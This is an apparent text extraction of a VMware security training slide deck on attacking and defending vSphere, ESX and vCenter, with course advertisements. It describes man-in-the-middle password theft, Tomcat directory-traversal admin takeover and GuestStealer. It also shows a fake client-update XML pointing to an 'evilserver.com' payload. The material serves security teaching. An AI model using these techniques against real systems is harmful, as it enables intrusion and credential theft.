WELCOME!

Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+

Hacking Uncovered: VMware® Advanced VMware® SecurityThe Latest Threats and Tools

Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.

Cool Offer!

vSphere Just Another Layer to Attack?Recent Cases involving VMware

What are you in for? Hold On!

Pen Testing Methodology

GueststealerTomCat Zero Day Directory TraversalVASTOMitigation Techniques3rd Party Mitigation Tools

VMware – 80% of the Market Share

Do the Tools used in Pen Testing work with virtualization?

Are there hacks being designed just for VMware?

What is this costing us?

What is Happening today?

The Need is Here!

• CyberCrime and CyberWar Predictions for 2011

• #2 – Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft.

Hackin9 – Issue 01/2011(37)

What are the main security concerns associated with virtualization in general?Segregation of DutiesAccounting/LoggingNew API’s

VMsafevStoragevNetwork

VMsafe Virtual AppliancesPlug-InsShare Resources – can they be attacked?

Memory, CPU, Datastore

Time to Discuss

Virtualization – Just Another Layer to Attack

• vSphere Client• API’s • Plugin’s - VMware

• Update Manager• Guided Consolidation• VMware Converter• Storage vMotion

• Plugin’s - 3rd Party• Back Up Solutions (3rd Party -

Veeam)• RDP - (3rd Party - The RDP plug-

in, by Juxtaposition) • Invoke Plugin

Management

Interfaces

Web Service

ESX and vCenter both use a Web Service• vCenter on by

default – Why?• ESX disabled –

Thank God

Tomcat Web Service• How many

holes have we found here? WOW

Utilizes a Proxy• The is the

same proxy used by hostd.

VMware is using an old version of TomCat that leaves the username

and password in a world readable file!

Fixed by a recent update for vCenter 4.1

TomCat

VMCI

• It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted end-point.

• This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7.

VMCI, or Virtual Machine Communications Interface is an interface designed in the hardware of a VM.

http://pubs.vmware.com/vmci-sdk/VMCI_intro.html

ThreatsPerceivedKnown

RisksProbabilityPotential Impact

Time to Discuss

Secunia Historic AdvisoriesESX 4.xESXi 4.xvCenter Server 4.x

nvd.nist.govOver 40 Vulnerabilities for VMware Products

McAfee ThreatsVMware

ESX Server Heap Buffer OverflowvCenter Update Manager CSSvCenter Update Manager Directory Traversal

Some Vulnerabilities

Chained Exploit Example130 Million Credit Cards Stolen – Gonzalez Indictment• SQL Injection Attacks• SQL Injection Strings• Malware• Root kits• Visiting the stores• Disabling the logs• Using Proxies

Little Known Fact:Occurred on VMware!!!!

This does not change, regardless of the environment being tested.Information GatheringScanningEnumerationPenetration

FailStart Over or tell them great job

SucceedEscalate PrivilegesSteal Data or Leave proof of hackCover TracksLeave Backdoors

Methodology

GoogleNMAP – Since v4.8EttercapCain and AbelMetasploit

Claudio CriscioneVASTO – Virtualization ASsessment

TOolkit

Tools….

Shodan – You have to be kidding me!

Shodan – You have to be kidding me!

We have to find the systems first. Just like any other service, ESX has its own

tells. NMAP – will give you what you need. Lets see this in action!

Scanning for ESX

• Yes you can create your own modules.• We will take a look at VASTO – Virtualization ASsessment Toolkit by Claudio Criscione

Auxiliary Modules

• The purpose of meterpreter scripts are to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit)

• Meterpreter is an effective tool for creating backdoors.

Meterpreter

How we understand Fake Certificate Injection to work.

ARP Cache Poisoning will allow us to perform a successful SSL crack!

The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One

between the victim and the hacker, the other between the hacker and the real server.

The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.

SSL request

SSL reply(Fake certificate)

SSL request

SSL reply(Real Self Signed Cert)

F&JLMDHGST*KU P)JDGH$FDSD@Cleartext

Copy &

Alter

Stop

ESX Sever

VIC Client Login

Stealing the Password

DECISION TIME!

Password Revealed…

You are still vulnerable even if you use vCenter.

I can offer this:

Once the above password is stolen you can login to the host with the vpxuser and above password.

Screenshots

Presented at SchmooCon 2010

VULNERABLE VERSIONS

• Server• VMware Server 2.x < 2.0.2 build

203138 (Linux)• VMware Server 1.x < 1.0.10 build

203137 (Linux)• ESX/ESXi• ESX 3.5 w/o ESX350-200901401-SG• ESX 3.0.3 w/o ESX303-200812406-BG• ESXi 3.5 w/o ESXe350-200901401-I-SG

• Thanks for the Virtual Machines!GuestStealer

• How Large is your dictionary file?

Dictionary Attack

• Need to know exactly what is running?

Fingerprinting Tool

VASTO – Auxiliary Modules

vSphere Client Communication

Auto Update Process•<patchVersion>3.0.0</patchVersion>•<apiVersion>3.1.0</apiVersion>•<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>

Client Server

1

23

4

GET /client/clients.xmlAutoUpdate URL

RetrieveServiceInstance

ServiceInstance

RetrieveServiceStatus

Status

GET /client/clients.xmlAutoupdate URL

Login

The Auto Update Process

• <patchVersion>3.0.0</patchVersion>• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://*/client/

VMware-viclient.exe</downloadUrl>

The Evil Guy

• <patchVersion>10.0.0</patchVersion>

• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://

evilserver.com/evilpaypoad.exe</downloadUrl>

VASTO VILurker

Change the clients.xml filename

The package will run under the user’s privilege!• Administrator

Anyone?

Provide your nasty trojan package.• Could be combined

with other attacks.

Create a fake web interface so

you look ligit!

This can be done as MiTM or

Rouge Server

You will trigger a “certificate error”

VASTO VILurker

VASTO Autopwn

Autopwn – How easy can it get?

Uses a flaw in the Tomcat Web Server

Transfers the Latest Session File from vCenter using a

Directory Traversal Attack.

Admin rights without knowing a

username or password!

Mitigating These Vulnerabilities

• Vmware• vShield Zones

• 3rd Party• Altor• Reflex• CheckPoint• Astaro Security Gateway• Tripwire• Catbird• HyTrust

Mitigation Tools – Best of the Breed

TrendMicro Deep SecurityTrend Micro Deep Security provides advanced

security for physical, virtual, and cloud servers and virtual desktops.

ModulesAgentless Malware Detection for VMsDeep Packet InspectionIntrusion Detection and PreventionWeb Application and ProtectionApplication ControlBidirectional Stateful FirewallIntegrity MonitoringLog Inspection

Deep Security Architecture

In-depth Look – *Authors PicksCatbird

Catbird TrustZones® policy-based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers.Catbird virtual security

appliance performs several functions: Hypervisor auditing Virtual network IPS Network segmentation and

access control Vulnerability management Multi-tenant security Reports to management

console

Catbird appliances collect data and enforce policies

Appliances report events to management console

Management console analyses events andcorrelates to compliance framework

Catbird – continuous compliance

1. Course Introduction and Methodology2. Penetration Testing 1013. Primer and Reaffirming our Knowledge4. Security Architecture, vCPU, vMemory5. Routing and the vNetwork6. vStorage – Architecture and Security Implementations7. Hardening the Virtual Machines8. Hardening the Host9. Hardening Virtual Center10. Virtualizing your DMZ11. 3rd Party Mitigation Tools12. Putting it all Together

VMware Advanced Security

1. Course Intro & Methodology 2. Virtualization Overview3. Planning & Installing ESX/ESXi 44. Using Tools to Administer a VMware Environment5. Configuring Networking6. Configuring Storage7. vCenter Server 4 and Licensing8. VM Creation and Configuration & Snapshots9. Security and Permissions10. Server and VM Monitoring11. Advanced ESX and vCenter Management12. Patching and Upgrading ESX/ESXi13. Disaster Recovery and Backup

50 Hours of Training – 6.5 Classes in ONE

vSphere 4.1 Ultimate Bootcamp

Does vSphere really have some major

issues?

Recent Cases involving ESX

Pen Testing Methodology

Web Related issues VASTO Mitigation

techniques

Questions?

Review